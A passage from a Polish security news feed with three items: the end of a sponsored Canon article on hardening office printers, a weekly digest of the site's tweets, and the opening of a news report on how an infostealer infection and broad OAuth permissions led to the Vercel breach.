<p class="p1">Załóżmy, że firma dokonała dobrego wyboru – urządzenia drukujące spełniają normy bezpieczeństwa, mają certyfikowane moduły, wspierają szyfrowanie, audyt, kontrolę dostępu. To jednak tylko pozorne bezpieczeństwo.</p>
<p class="p1">Bo urządzenie „prosto z pudełka”: otwiera zbyt wiele portów, udostępnia zbędne protokoły, nie wymusza haseł, pozwala drukować wszystko każdemu, nie szyfruje transmisji, nie zapisuje logów, nie integruje się z żadną polityką firmy…</p>
<p class="p2">To jak posiadać najlepszy miecz… i walczyć gołymi rękami.</p>
<p class="p2">To nie jest teoria. To jest codzienność w biurach. Domyślna konfiguracja MFP jest <strong>wygodna</strong> dla użytkownika, ale <strong>zdradliwa</strong> dla bezpieczeństwa i <strong>śmiertelna</strong> dla infrastruktury.</p>
<blockquote><p><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f536.png" alt="🔶" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Po drugie: Nie klikaj na czuja. Użyj Security Settings Navigator</p>
</blockquote>
<p class="p1">Jeśli teraz myślisz: „OK, to wejdę w ustawienia i wyłączę wszystko” &#8211; stop.<br />
Samuraj nie macha mieczem na oślep.</p>
<p class="p1">W japońskim uniwersum <span class="s2"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f609.png" alt="😉" class="wp-smiley" style="height: 1em; max-height: 1em;" /></span> możesz sięgnąć po narzędzie typu <b><a href="https://www.canon.pl/business/solutions/security-navigator/" target="_blank">Security Settings Navigator</a></b>, które prowadzi cię przez hardening jak mistrz podczas treningu w dojo:</p>
<ul class="ul1">
<li class="li4">zadaje kilka pytań o środowisko (dosłownie kilka, bez doktoratu),</li>
<li class="li4">podpowiada zmiany zgodne z dobrymi praktykami NIST: minimalizacja uprawnień, ograniczenie usług, segmentacja, szyfrowanie,</li>
<li class="li4">na końcu daje ci konkretną listę ustawień do wdrożenia.</li>
</ul>
<p class="p1">&#8211; W praktyce drukarki rzadko mają<span class="Apple-converted-space">&nbsp; </span>przypisanego jednego „właściciela”, a w efekcie są trochę niczyje. Admin sieci widzi je jako kolejny adres IP do ogarnięcia, security skupia się na serwerach i firewallach, a sama drukarka ląduje gdzieś pomiędzy &#8211; podłączona do sieci, z własnym systemem i usługami, których nikt na co dzień nie pilnuje.</p>
<p><strong>Security Settings Navigator</strong> pomaga domknąć ten temat bez zgadywania. Zamiast klikania „na wyczucie” prowadzi krok po kroku i zamienia ogólne zasady bezpieczeństwa w konkretne, sensowne ustawienia urządzenia. Bez wróżenia z fusów i przypadkowego klikania wszystkiego, co da się wyłączyć – mówi <strong>Daniel Mazur,</strong> dyrektor działu technicznego w Inforoffice Polska.</p>
<blockquote><p><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f536.png" alt="🔶" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Po trzecie: Spójrz zagrożeniom w oczy.</p>
</blockquote>
<p class="p1">Chcesz prostą zasadę NIST-ową, która robi największą różnicę? <strong>Powiąż operacje z tożsamością.</strong></p>
<p class="p1">Jeśli dziś u ciebie jest tak:</p>
<ul class="ul1">
<li class="li4">każdy może podejść i wydrukować/zeskanować,</li>
<li class="li4">„PIN jest wspólny”,</li>
<li class="li4">logi są „jakieś” albo żadne,</li>
</ul>
<p class="p1">to masz idealne warunki, żeby w razie incydentu ktoś powiedział: <i>„to nie ja”</i> &#8211; i na tym kończy się badanie ścieżek wroga.</p>
<p class="p1">Zrób więc to, co robisz w innych systemach:</p>
<ul class="ul1">
<li class="li4">włącz uwierzytelnianie (karta/PIN/SSO),</li>
<li class="li4">rozdziel role (użytkownik vs admin vs użytkownik vs serwis),</li>
<li class="li4">ogranicz funkcje zależnie od roli,</li>
<li class="li4">loguj i audytuj.</li>
</ul>
<p class="p4">&#8211; Największa różnica ‘po hardeningu’ to moment, w którym operacje na MFP przestają być anonimowe. Jeśli drukujesz, kopiujesz, skanujesz &#8211; to jest to przypięte do tożsamości – dodaje Daniel Mazur, Inforoffice Polska.</p>
<blockquote><p><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f536.png" alt="🔶" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Po czwarte: Zamknij zbędne bramy. Mniej protokołów = mniej problemów</p>
</blockquote>
<p class="p1">Teraz robisz ulubioną część adminów: <strong>redukcję powierzchni ataku</strong>. Wyobraź sobie MFP jako zamek. Jeśli masz 12 bram, to cyberninja nie musi być geniuszem &#8211; wystarczy, że jedna jest uchylona.</p>
<p class="p1">Twoje zadanie:</p>
<ul class="ul1">
<li class="li4">wyłącz protokoły, których nie używasz (serio, <i>nie używasz</i>),</li>
<li class="li4">zostaw tylko te, które są potrzebne do realnych procesów,</li>
<li class="li5">zabezpiecz panel administratora: tylko HTTPS i dostęp wyłącznie z określonych adresów/VLANów.</li>
<li class="li5">kontroluj pozostałą komunikację: skonfiguruj ACL/filtry IP i segmentację.</li>
</ul>
<p>To jest dokładnie ta część, w której drukarka przestaje być „łatwym celem”.</p>
<blockquote><p><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f536.png" alt="🔶" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Po piąte: “Szyfruj albo giń” + FIPS 140-3</p>
</blockquote>
<p class="p1">Tu wchodzimy na poziom, gdzie nie da się już powiedzieć: „to tylko drukarka”. MFP przetwarza dane. Czasem bardzo wrażliwe.</p>
<p>To oznacza, że:</p>
<ul class="ul1">
<li class="li2"><b>dane w spoczynku</b> (na dysku),</li>
<li class="li2"><b>dane w tranzycie</b> (po sieci),</li>
<li class="li4"><b>tożsamość i rozliczalność</b> (kto, co, kiedy zrobił)</li>
</ul>
<p class="p4">…muszą być chronione jak w każdej innej części IT.</p>
<p class="p1">FIPS 140-3 jest standardem certyfikacji modułów kryptograficznych. Nie chodzi o to, żebyś teraz recytował listę algorytmów. Chodzi o to, żeby kryptografia w urządzeniu była <strong>sprawdzalna, aktualna i sensownie wdrożona</strong>.</p>
<p class="p1">W praktyce:</p>
<ul class="ul1">
<li class="li2">szyfrujesz dane na dysku (żeby kradzież urządzenia nie była kradzieżą danych),</li>
<li class="li2">wymuszasz TLS/HTTPS (żeby wydruki i skany nie latały “plaintextem”),</li>
<li class="li2">spinasz urządzenie z katalogiem/SSO (żeby operacje były przypisane do użytkownika).</li>
</ul>
<p class="p1"><b><br />
</b>&#8211; <em>Kryptografia i tożsamość to dwa filary. Jeśli drukujesz bez autoryzacji i bez szyfrowania, to nawet najlepszy firewall nie uratuje cię przed własną infrastrukturą </em>– dodaje Dariusz Szwed, Canon Polska.</p>
<blockquote><p><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f536.png" alt="🔶" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Po szóste:<b>Posprzątaj po sobie. Bufory i historie to też dane</b></p>
</blockquote>
<p class="p1">NIST 800-88 mówi o sanitizacji danych. Brzmi prawie tak samo jakbym mówił do Ciebie po japońsku?</p>
<p>W odniesieniu do MFP oznacza to: <strong>nie zostawiaj śladów, które ktoś może później wykorzystać przeciw Tobie</strong>.</p>
<p class="p1">Sprawdź/włącz:</p>
<ul class="ul1">
<li class="li4">automatyczne czyszczenie danych zadań i buforów,</li>
<li class="li4">nadpisywanie danych tam, gdzie jest wspierane,</li>
<li class="li4">sensowną retencję logów (żeby pomagały, a nie szkodziły).</li>
</ul>
<p class="p5">To jeden z tych rytuałów, których znaczenia często się nie docenia, dopóki nie nadejdzie czas próby, a audyt lub incydent nie odsłoni prawdy…</p>
<blockquote><p><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f536.png" alt="🔶" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Po siódme: Pokaż mi porty, a powiem ci, czy Twoja twierdza przetrwa oblężenie</p>
</blockquote>
<p class="p4">Przed hardeningiem często zobaczysz:</p>
<ul class="ul1">
<li class="li4">dużo otwartych portów,</li>
<li class="li4">kilka aktywnych usług „bo tak”,</li>
<li class="li4">admina dostępnego z sieci użytkowników,</li>
<li class="li4">brak twardego wymuszenia szyfrowania.</li>
</ul>
<p class="p1">Po wdrożeniu polityk w duchu NIST i FIPS:</p>
<ul class="ul1">
<li class="li4">portów robi się wyraźnie mniej (czasem drastycznie),</li>
<li class="li4">zostają tylko potrzebne usługi,</li>
<li class="li4">admin jest w kontrolowanej strefie,</li>
<li class="li4">komunikacja jest szyfrowana,</li>
<li class="li4">stare protokoły znikają.</li>
</ul>
<p class="p1">To nie jest kosmetyka. To jest realna zmiana profilu obrony: ograniczona powierzchnia ataku, większa szansa na przetrwanie, gdy nocą do bram podejdzie wróg.</p>
<p><a name="flota" href=""></a></p>
<h3>Security Settings Navigator oczywiście nie jest lekarstwem na wszystko.<br />
Masz flotę? Potrzebujesz zarządzania.</h3>
<p class="p1">Jeśli masz jedną drukarkę, możesz przemierzać drogę bezpieczeństwa jako <strong>wojownik samotnik</strong>, który zna każdy port, każdą usługę, każdy ruch maszyny. Jeśli masz ich 80… to już nie jest nawet dojo, tylko pełnowymiarowe pole bitwy, włączające konieczność strategicznego planowania.</p>
<p class="p1">Security Settings Navigator ma sens szczególnie dla małych środowisk lub pojedynczych urządzeń.</p>
<p>Przy dużej skali nie chodzi już tylko o ochronę. Chodzi o dyscyplinę &#8211; o to, by każde urządzenie, w każdej lokalizacji, działało zgodnie z jedną ścieżką, jednym kodeksem.</p>
<p class="p1">Do tego potrzeba już narzędzi zdolnych do:</p>
<ul class="ul1">
<li class="li1">masowych zmian konfiguracji,</li>
<li class="li1">weryfikacji zgodności,</li>
<li class="li1">aktualizacji,</li>
<li class="li1">raportów pod audyt</li>
</ul>
<p class="p6">I ten wątek otwiera kolejną sagę o Samuraju, który strzeże firmowych danych.</p>
<p class="p1"><strong>Hardening jest rytuałem wejścia, a utrzymanie zgodności &#8211; dowodem, że wojownik pozostaje wierny swojemu przeznaczeniu.</strong></p>
<div class="info">Autorem niniejszego artykułu jest <strong>Canon Polska</strong>, producent i dostawca rozwiązań do druku i obiegu dokumentów, w których bezpieczeństwo jest <a href="https://www.canon.pl/press-centre/press-releases/2026/04/canon-recognised-as-a-leader-in-the-worldwide-print-security-solutions-and-services-hardcopy/" target="_blank">elementem architektury</a>, a nie dodatkiem. Artykuł jest artykułem sponsorowanym i za jego publikację otrzymaliśmy wynagrodzenie.Rozwiązania do druku od <strong>Canon Polska</strong> stawiają na bezpieczeństwo, co widać zarówno w zaawansowanych urządzeniach wielofunkcyjnych z <a href="https://www.canon.pl/business/products/office-printers/multifunction/imageforce/" target="_blank">serii imageFORCE</a>, tworzonych z myślą o środowiskach o podwyższonych wymaganiach bezpieczeństwa, jak i laserowych drukarkach Canon <a href="https://www.canon.pl/printers/laser-printers/" target="_blank">iSENSYS</a>, które już w podstawowej konfiguracji oferują szyfrowanie danych, silne mechanizmy uwierzytelniania i nowoczesne standardy sieciowe.</p>
<p>Partnerem merytorycznym artykułu jest także <a href="https://inforoffice.pl/bezpieczenstwo-druku/" target="_blank">Inforoffice Polska</a><br />
Akredytowany Partner Canon Polska. Integrator rozwiązań z zakresu druku, kopiowania, skanowania i cyfrowego obiegu dokumentów. Specjalizuje się we wdrażaniu bezpiecznych środowisk pracy z dokumentami, łącząc urządzenia Canon z systemami zarządzania dokumentami, kontroli dostępu i politykami bezpieczeństwa organizacji.</p>
</div>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/dlaczego-drukarki-w-stanie-fabrycznym-to-stan-zagrozenia-a-nie-gotowosci/#comments" rel="replies" thr:count="11" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/dlaczego-drukarki-w-stanie-fabrycznym-to-stan-zagrozenia-a-nie-gotowosci/feed/atom/" rel="replies" thr:count="11" type="application/atom+xml"/>
			<thr:total>11</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[O czym pisaliśmy w zeszłym tygodniu, ale &#x274c; NIE na Niebezpieczniku?]]></title>
		<link href="https://niebezpiecznik.pl/post/o-czym-pisalismy-w-zeszlym-tygodniu-ale-nie-na-niebezpieczniku/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=27044</id>
		<updated>2026-04-27T10:17:50Z</updated>
		<published>2026-04-27T10:15:21Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="Niebezpiecznik"/><category scheme="https://niebezpiecznik.pl" term="Twitter"/><category scheme="https://niebezpiecznik.pl" term="X"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/o-czym-pisalismy-w-zeszlym-tygodniu-ale-nie-na-niebezpieczniku/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/niebezpiecznik-logo-black-150x150.png" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>W jednym z ostatnich artykułów przypomnieliśmy, że nasza redakcja jest najbardziej aktywna na Twitterze. Część z Was zwróciła uwagę, że na Twittera nie zagląda i zasugerowała, aby publikować tu, na Niebezpieczniku, jakiś &#8220;skrót&#8221; tego o czym twitujemy. No więc oto pierwszy z takich skrótów, podsumowujący zeszły tydzień naszej aktywności na Twitterze (~40 wpisów, ~5 dziennie). Zanim [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/o-czym-pisalismy-w-zeszlym-tygodniu-ale-nie-na-niebezpieczniku/"><![CDATA[<p>W jednym z ostatnich artykułów przypomnieliśmy, że nasza redakcja jest najbardziej aktywna na Twitterze. Część z Was zwróciła uwagę, że na Twittera nie zagląda i zasugerowała, aby publikować tu, na Niebezpieczniku, jakiś &#8220;skrót&#8221; tego o czym twitujemy. No więc oto pierwszy z takich skrótów, podsumowujący zeszły tydzień naszej aktywności na Twitterze (~40 wpisów, ~5 dziennie). </p>
<p>Zanim jednak do niego przejdziemy &#8212; słowo wyjaśnienia, dlaczego na Twitterze pojawiają się treści, których nie widać na Niebezpiecznik.pl. <span id="more-27044"></span></p>
<h3>Dlaczego Twitter?</h3>
<p>Od zawsze staramy się, aby na Niebezpiecznika trafiały dłuższe, przemyślane i mocno merytoryczne publikacje. Bo Niebezpiecznik to serwis internetowy, a nie platforma społecznościowa. Nie każdy wpis z Twittera da się rozwinąć do tego typu formy &#8212; a <strong>na siłę nie ma sensu tego robić</strong>. Coś co może być jednym zdaniem, lepiej żeby pozostało jednym zdaniem, a nie przepełnionym miałką treścią artykułem na 15 akapitów. To pierwszy, najważniejszy powód. Drugim powodem jest to, że na Twitterze często podajemy lub &#8220;retwitujemy&#8221; dalej cudze treści bez jakiegokolwiek opisu. To zdecydowanie szybsze i mniej pracochłonne niż pełnoprawna publikacja na Niebezpieczniku.  </p>
<p>I żeby było jasne &#8212; <strong>Twitter nie jest idealną platformą</strong> (wręcz jest bardzo nieidealną), ale ze uważamy, że jeśli chodzi o obszar IT Security, to ze wszystkich social mediów jest platformą najlepszą, jeśli chodzi o ilość i jakość wiedzy oraz <strong>prędkość</strong> jej pozyskiwania (jeśli się wie, kogo śledzić). Dlatego tych z Was, którzy zajmują się cyberbezpieczeństwem zawodowo, zachęcamy do <a href="https://x.com/niebezpiecznik">obserwowania naszego profilu</a> &#8212; abyście trzymali rękę na pulsie, bo to w naszej branży jest szalenie istotne. Np. opisywany przez nas tydzień temu na Twitterze <a href="https://x.com/niebezpiecznik/status/2046490369584402936" target="_blank">hack Polymarketu suszarką</a> niektóre serwisy opisuję dopiero dziś, po tygodniu&#8230; </p>
<p>Reszcie naszych Czytelników, mamy nadzieję, że wystarczą takie podsumowania jak to.</p>
<ol>
<li><a href="https://x.com/niebezpiecznik/status/2045941650048929886?s=20">Film pokazujący narzędzie &#8220;Maven&#8221; od Palantira w akcji</a>.</li>
<li><a href="https://x.com/niebezpiecznik/status/2046161621970546968">Ostrzeżenie o awarii Polcardu</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2046285079228362756">Ciekawy wątek o antenach szpiegowskich na dachu rosyjskiej ambasady w Wiedniu</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2046303797321093470">Wątek o &#8220;wycieku danych&#8221; z seriwsu do vibecodingu: Lovable</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2046463456807669905">Video laptopa z 1989 &#8212; uwaga, uronicie łzę</a>.</li>
<li><a href="https://x.com/niebezpiecznik/status/2046490369584402936">Historia o tym jak ktoś wygrał kupę kasy w zakładzie na Polymarket &#8230;suszarką, którą sztucznie podbił temperature w okolicach czujnika na lotnisku.</a> </li>
<li><a href="https://x.com/niebezpiecznik/status/2046589465477394527" target="_blank">O chaosie w Zondzie</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2046602622157590715" target="_blank">O tym że wszędzie większość treści to już prawie treści generowane przez AI</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2046646650014175608" target="_blank">O tym jak kopanie prądem porfeli bitocoinowych pomaga wykraść z nich środki</a>.</li>
<li><a href="https://x.com/niebezpiecznik/status/2046662100064375125" target="_blank">Porady co do bezpiecznego sposobu na kasowanie kont z serwisów internetowych.</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2046826117726618106" target="_blank">O tym jak typy z Discorda uzyskały dostęp do Mythosa od Anthropica na lewo</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047013570357944573">Komunikat dla użytkowników Jiry i Confluence o tym, że mają czas do 27 sierpnia aby wypisać się z użycia ich danych do szkolenia modeli AI</a>.</li>
<li><a href="https://x.com/niebezpiecznik/status/2047195743434277069" target="_blank">Opis ciekawego sposobu na wyciek danych z iPhona i poprawki bezpieczeństwa do iOS</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047195767308222708" target="_blank">Demo narzędzia do spoofingu GPS</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047217628419162250" target="_blank">O ataku na niemieckich polityków przez Signala.</a></li>
<li>A tego posta to zacytujemy w całości bo śmieszny:<br />
<blockquote class="twitter-tweet">
<p lang="pl" dir="ltr">Kamil napisał: &quot;W naszej firmie właśnie ruszyła <img src="https://s.w.org/images/core/emoji/17.0.2/72x72/274c.png" alt="❌" class="wp-smiley" style="height: 1em; max-height: 1em;" /> fala zwolnień ze względu na AI. Okazało się, że kosz tokenów modeli AI zrobił się tak duży, że anulowaliśmy 5 subskrypcji narzędzi AI i zatrudniliśmy 2 senior programistów&quot;</p>
<p>&mdash; Niebezpiecznik (@niebezpiecznik) <a href="https://twitter.com/niebezpiecznik/status/2047230252091322588?ref_src=twsrc%5Etfw">April 23, 2026</a></p></blockquote>
<p> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></li>
<li><a href="https://x.com/niebezpiecznik/status/2047245653860860401" target="_blank">O ataku na skaner kodu Checkmarx i ryzykach z tym związanych dla jego użytkowników</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047253747810586786" target="_blank">Apel aby uważać na wyszukiwarkę tanich lotów Kiwi</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047224526971306275" target="_blank">Komentarz do smutnej historii przedsiębiorcy, który chciałby korzystać z systemów rządowych na 16 letnim komputerze.</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047316097255268621" target="_blank">Opis zhackowania Bitwardena CLI</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047378473912586642" target="_blank">O tym że Chińczycy destylują Amerykanów</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047566693132624016" target="_blank">O taśmach Suszek &#8211; Zaorski i długach liczonych w milionach</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047574190824276364" target="_blank">Test autotłumaczenia</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047589150094762141" target="_blank">O kolejnej osobie, która ograła Polymarket: żołnierzu USA co zarobił 1,5 miliona złotych.</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047594393322840328" target="_blank">Memik na temat wykorzystania tokenów AI w firmach</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047654548060147863" target="_blank">O upadających programach Bug Bounty</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047931615058305101" target="_blank">O chińskim detektorze StarLinków</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047960575779516636" target="_blank">Komentarz do fakenewsa na temat sprzedaży danych klientów Zondy</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2048008936800887105" target="_blank">Informacja o inwestycji Google w Anthropic: 40 miliardów dolarów</a>.</li>
<li><a href="https://x.com/niebezpiecznik/status/2048027295026127111" target="_blank">O nowych ustawieniach treści w Twitterze</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2048102767802159368" target="_blank">O hacku Ukraińców spotkania rekrutacyjnego, na którym zachęcano studentów do wstąpienia do armii</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2048104255865639309" target="_blank">O dużej akcji rozmontowania azjatyckiego scam center które robiło wały &#8220;na romanse&#8221;, &#8220;na pracownika banku&#8221; it</a>p.</li>
<li><a href="https://x.com/niebezpiecznik/status/2048365051040415805" target="_blank">O tym, że ograniczenie wieku w Australii w dostępie do social mediów nie zadziałało</a>.</li>
<li><a href="https://x.com/niebezpiecznik/status/2048409777055609281" target="_blank">O teściach w osobnym VLAN-ie</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2048454814070079995" target="_blank">O wzrastającej fali ataków fizycznych na kryptowalutowych Francuzów</a> </li>
<li><a href="https://x.com/niebezpiecznik/status/2048461923419648139" target="_blank">O tym, że najsławniejsza zbiórka w polskim internecie (łatwogang) rozłożyła serwery siepomaga</a></li>
</ol>
<p>&nbsp;</p>
<p>Dajcie znać, czy takie podsumowania jak to mają dla Was wartość? Czy mamy je kontynuować? A może wyobrażacie sobie je inaczej? Jeśli tak &#8212; co dodać, co zmienic? </p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/o-czym-pisalismy-w-zeszlym-tygodniu-ale-nie-na-niebezpieczniku/#comments" rel="replies" thr:count="5" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/o-czym-pisalismy-w-zeszlym-tygodniu-ale-nie-na-niebezpieczniku/feed/atom/" rel="replies" thr:count="5" type="application/atom+xml"/>
			<thr:total>5</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Zhackowali ich, bo pracownik SaaS z którego korzystali pobrał cheaty do gier. Czyli dlaczego trzeba uważać na OAuth!]]></title>
		<link href="https://niebezpiecznik.pl/post/zhackowali-ich-bo-pracownik-saas-z-ktorego-korzystali-pobral-cheaty-do-gier-czyli-dlaczego-trzeba-uwazac-na-oauth/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=27020</id>
		<updated>2026-04-21T11:40:24Z</updated>
		<published>2026-04-21T11:40:24Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="AI"/><category scheme="https://niebezpiecznik.pl" term="Contex.ai"/><category scheme="https://niebezpiecznik.pl" term="eskalacja przywilejów"/><category scheme="https://niebezpiecznik.pl" term="Google Workspace"/><category scheme="https://niebezpiecznik.pl" term="infostealer"/><category scheme="https://niebezpiecznik.pl" term="malware"/><category scheme="https://niebezpiecznik.pl" term="SaaS"/><category scheme="https://niebezpiecznik.pl" term="stealer"/><category scheme="https://niebezpiecznik.pl" term="Vercel"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/zhackowali-ich-bo-pracownik-saas-z-ktorego-korzystali-pobral-cheaty-do-gier-czyli-dlaczego-trzeba-uwazac-na-oauth/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel-150x150.png" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Jaka piękna katastrofa! W tej historii jest wszystko: infekcja nie jednego, a dwóch niezbyt roztropnych pracowników różnych &#8220;technicznych&#8221; firm. Przeskok z jednej zainfekowanej infrastrukry na drugą, bo żadna z firm nie korzystała z zasady minimalnych przywilejów a można odnieść wrażenie, że w ogóle z żadnych mechanizmów bezpieczeństwa. I wreszcie grupa atakujących, która kradnie tożsamość innej [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/zhackowali-ich-bo-pracownik-saas-z-ktorego-korzystali-pobral-cheaty-do-gier-czyli-dlaczego-trzeba-uwazac-na-oauth/"><![CDATA[<p>Jaka piękna katastrofa! W tej historii jest wszystko: infekcja nie jednego, a dwóch niezbyt roztropnych pracowników różnych &#8220;technicznych&#8221; firm. Przeskok z jednej zainfekowanej infrastrukry na drugą, bo żadna z firm nie korzystała z zasady minimalnych przywilejów a można odnieść wrażenie, że w ogóle z żadnych mechanizmów bezpieczeństwa. I wreszcie grupa atakujących, która kradnie tożsamość innej grupie oraz plujący jadem internetowi przeciwnicy vibecodingu, którzy z widłami poszli na firmę, bo przecież wiadomo, że &#8220;każdy programista AI to debil&#8221;. A okazało się, że AI nie miało z tym atakiem niczego wspólnego.<span id="more-27020"></span></p>
<h3>Od czego się zaczęło?</h3>
<p>19 kwietnia na znanym hackerskim forum pojawiła się informacja o tym, że popularna wśród vibecoderów platforma Vercel została zhackowana. Atakujący podpisujący się jako ShinyHunters wystawili na sprzedaż klucze i dostępy do bazy danych firmy. Zrobiło się gorąco w środowisku, bo Vercel stoi też za narzędziem v0 oraz popularną biblioteką Next.js, a to od razu przywołało <a href="https://niebezpiecznik.pl/tag/supply-chain/" target="_blank">ostatnie głośne ataki supply chain</a>.</p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/vercel-hacked.jpeg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/vercel-hacked-600x489.jpeg" alt="" width="600" height="489" class="aligncenter size-large wp-image-27021" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/vercel-hacked-600x489.jpeg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/vercel-hacked-307x250.jpeg 307w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/vercel-hacked.jpeg 739w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<p>Na początku oczywiście spekulowano, że przełamanie zabezpieczeń to wynik użycia beztroskiego vibecodingu do budowy i konfiguracji mechanizmów bezpieczeństwa Vercela. Bo firma z vibecodingiem jest kojarzona. Ale prawda okazała jeszcze bardziej bolesna. Źródłem ataku był łańcuch dwóch pracowników. </p>
<ul>
<li>Pierwszy to pracownik zewnętrznej firmy &#8212; Contex.ai, który pobierał &#8230;cheaty do gry Roblox zainfekowane infostealerem Lumma. Dzięki temu atakujący mieli dostęp do infrastruktury firmy Contex.ai oraz danych jej klientów. Dwa miesiące temu 17 lutego. Poniżej widok tego, co infostealer wystawiał z jego hosta:
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel.png"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel-350x241.png" alt="" width="350" height="241" class="aligncenter size-medium wp-image-27022" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel-350x241.png 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel-600x412.png 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel-768x528.png 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel.png 1123w" sizes="auto, (max-width: 350px) 100vw, 350px" /></a></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel2.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel2-231x250.jpg" alt="" width="231" height="250" class="aligncenter size-medium wp-image-27024" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel2-231x250.jpg 231w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel2-554x600.jpg 554w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel2-768x831.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel2-1420x1536.jpg 1420w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel2.jpg 1438w" sizes="auto, (max-width: 231px) 100vw, 231px" /></a>
</li>
<li>Drugi to pracownik Vercela, który korzystał z narzędzi Contex.ai, ale zalogował się do nich ze swojego służbowego konta Google Workspace, dając im poprzez OAuth pełne uprawnienia (&#8220;allow all&#8221;) do środowiska Vercela.</li>
</ul>
<p>Infekcja pierwszego pracownika dała atakującym dostęp do jego uprawnień w różnych usługach (Supabase, Datadog, Authkit) oraz do skrzynki <span class="code">support@contex.ai</span>, dzięki której udało się im &#8220;zpivotować&#8221; do infrastruktury Vercela. Żadnego przejęcia hasła. Żadnego phishingu. Żadnego exploita. Kurtyna. </p>
<div class="info">
<a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/domino-vercel.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/domino-vercel-600x414.jpg" alt="" width="400" height="414" class="aligncenter size-large wp-image-27023" /></a></p>
